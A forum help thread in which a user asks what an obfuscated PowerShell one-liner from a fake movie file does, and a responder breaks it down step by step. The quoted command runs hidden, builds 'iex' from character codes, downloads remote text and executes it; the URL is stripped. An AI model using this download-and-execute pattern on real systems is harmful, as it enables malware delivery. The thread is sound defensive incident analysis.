need help with identifying actions of a malicious code

I’m looking for clues here. Long story short, one of our users ran what he thought was a movie file on his company laptop. But the file isn’t a actually a movie but a Powershell script. Well said he double-clicked on the “movie file” but nothing happened, but I suspect something did happen.

Script is below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ’ ‘,’’;sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString(‘httpp://’);s $nq


Could the experts chime in and tell me what this script does or attempt to do? I did check on the URL “” in the script and it points to a link to a text file. I’m assuming it’s a text file that the script will use?

Let’s break it down:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 

This runs powershell.exe in a hidden Window with ExecutionPolicy set to UnRestricted, which allows unsigned scripts to be run.

$ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ',"

This sets the variable $ag to ieX, which is an alias for the Invoke-Expression cmdlet.

sal s $ag

sal is an alias for Set-Alias.
s is now an alias for Invoke-Expression

$nq=((New-Object Net.WebClient)).DownloadString('')

This sets the $nq variable to the content of the text file.

s $nq

This runs Invoke-Expression against the text that was previously downloaded.

Without knowing the content of the text file it’s not possible to tell what happened next. My guess would be it’s some kind of dropper for malware, possibly ransomware.

You should consider the machine compromised, remove it from the network and rebuild it.

Thanks for the explanation. You were right, the “text file” is a dropper trojan. I’ve directed user to do a complete antivirus scan of his C: drive and it detected the text file as a dropper trojan.